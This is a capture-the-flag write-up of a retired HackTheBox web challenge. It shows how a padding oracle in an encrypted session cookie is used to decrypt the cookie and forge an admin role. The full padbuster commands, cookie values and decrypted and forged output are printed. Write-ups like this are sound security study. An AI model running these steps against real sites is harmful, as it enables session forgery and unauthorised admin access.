Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.

Challenge info

I know Mag1k [by rkmylo]
Can you get to the profile page of the admin?

The challenge

The website allows us to register an account and to login with our account. Of course the objective is to eventually login into the admin account.

IKnowMag1k - Register account

When we login with our newly created account, we go through the following steps:

  1. POST credentials (username and password) to /login.php
    We already have a PHPSESSID cookie.
  2. Be redirected to profile.php
    Notice we receive an additional iknowmag1k cookie.
  3. GET /profile.php

The iknowmag1k cookie definitely looks interesting. It looks like a URL-encoded string. URL-decoding it results in what looks to be a Base64 encoded string. Decoding this, however, does not return any legible output, so we are probably dealing with some form of encryption.

I had to peak at the forums to find out how I’m exactly supposed to tackle this challenge. It appears we are dealing with a Padding Oracle Attack.

So we use padbuster to try to decrypt the iknowmag1k cookie, which will most probably contain something usefull. We pass the script a URL to test against, our PHPSESSID cookie (since this may potentially be used in the encryption scheme), as well as our current iknowmag1k cookie. We then define the value of this last cookie as the value that had to be attacked.

$ padbuster "ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D" 8 -cookies "PHPSESSID=u43bpp75h91998f7d1icamg0l5; iknowmag1k=ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D"

** Finished ***

[+] Decrypted value (ASCII): {"user":"b8498756","role":"user"}

[+] Decrypted value (HEX): 7B2275736572223A226238343938373536222C22726F6C65223A2275736572227D0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F

[+] Decrypted value (Base64): eyJ1c2VyIjoiYjg0OTg3NTYiLCJyb2xlIjoidXNlciJ9Dw8PDw8PDw8PDw8PDw8P


It looks like this cookie holds the username and role of the logged in user. So we modify this to hold admin for both the username and the role. We then run this through padbuster again so it can encode a new valid cookie for us.

$ padbuster "ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D" 8 -cookies "PHPSESSID=u43bpp75h91998f7d1icamg0l5; iknowmag1k=ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D" -plaintext '{"user":"admin","role":"admin"}'

** Finished ***

[+] Encrypted value is: LDRCU61StZbYrdIXPROTGIprI45i7IsYMAovrw2IGp8AAAAAAAAAAA%3D%3D

We then reload the profile.php page, but modify the cookie value.

The flag

We are now greeted with the admin’s profile page, containing our flag 🙂